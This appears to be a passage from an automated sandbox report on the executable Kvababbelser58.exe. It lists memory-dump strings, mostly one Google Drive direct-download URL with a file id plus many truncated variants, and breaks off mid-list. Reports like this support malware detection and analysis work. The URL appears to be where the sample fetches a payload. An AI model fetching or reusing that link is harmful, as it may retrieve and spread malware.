      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/SLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
      Source: Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/SLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download&x
      Source: Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/SLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadJx
      Source: Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/SLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloade4x
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/SLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadider
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/SLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadt
      Source: Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/T
      Source: Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U
      Source: Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/_1
      Source: Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e
      Source: Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ificate
      Source: Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/j
      Source: Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ncisco1
      Source: Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ogleQ
      Source: Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r
      Source: Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?i
      Source: Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=do
      Source: Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rity
      Source: Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005483000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2638102038.000000000019B000.00000004.00000010.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2645673183.0000000005820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm
      Source: Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm$$
      Source: Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm/-d3
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm2P7MbvQ8Oxopcgm
      Source: Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm32859Z
      Source: Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8OxopcgmP
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8OxopcgmR
      Source: Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgmf
      Source: Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgmj
      Source: Kvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userco
      Source: Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercoEm
      Source: Kvababbelser58.exe, 00000007.00000003.2389230849.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.0000000005504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userconte
      Source: Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.go
      Source: Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/I
      Source: Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/K
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2178267049.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 